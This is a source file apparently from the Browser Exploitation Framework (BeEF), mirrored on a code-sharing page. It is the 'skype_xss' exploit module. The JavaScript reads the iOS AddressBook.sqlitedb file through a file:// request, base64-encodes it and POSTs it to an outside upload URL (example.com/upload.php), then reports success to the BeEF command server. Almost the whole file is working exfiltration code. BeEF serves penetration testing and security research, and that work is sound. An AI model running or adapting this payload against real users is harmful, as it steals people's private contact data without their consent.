Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/skype_xss/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6
beef.execute(function() {

7


8
	x = new XMLHttpRequest;

9
	x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");

10
	x.overrideMimeType("text/plain; charset=x-user-defined");

11
	x.send();

12
		

13
	x.onreadystatechange = function() {

14
		if(x.readyState == 4){

15
			a = x.responseText || "";

16
			ff=[];

17
			mx=a.length;

18
			scc = String.fromCharCode;

19
		}		

20
		for(var z = 0 ; z < mx ; z++){

21
			ff[z] = scc(a.charCodeAt(z)&255);

22
		}

23
		

24
		b=ff.join("");

25
		b=btoa(b);

26
		xp = new XMLHttpRequest;

27
		xp.open("post","http://example.com/upload.php",!0);

28
		xp.setRequestHeader("Content-Type","multipart/form-data;boundary=xxx,");

29
		a = "--xxx\r\nContent-Disposition:form-data;name=\"media\";filename=\"ios.sqlitedb\"\r\nContent-Type:application/octet-stream\r\n\r\n"+b+"\r\n--xxx--";

30
		xp.send(a);

31
	};

32
	

33
	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'SQL file sent');

34


35
});

36


37


38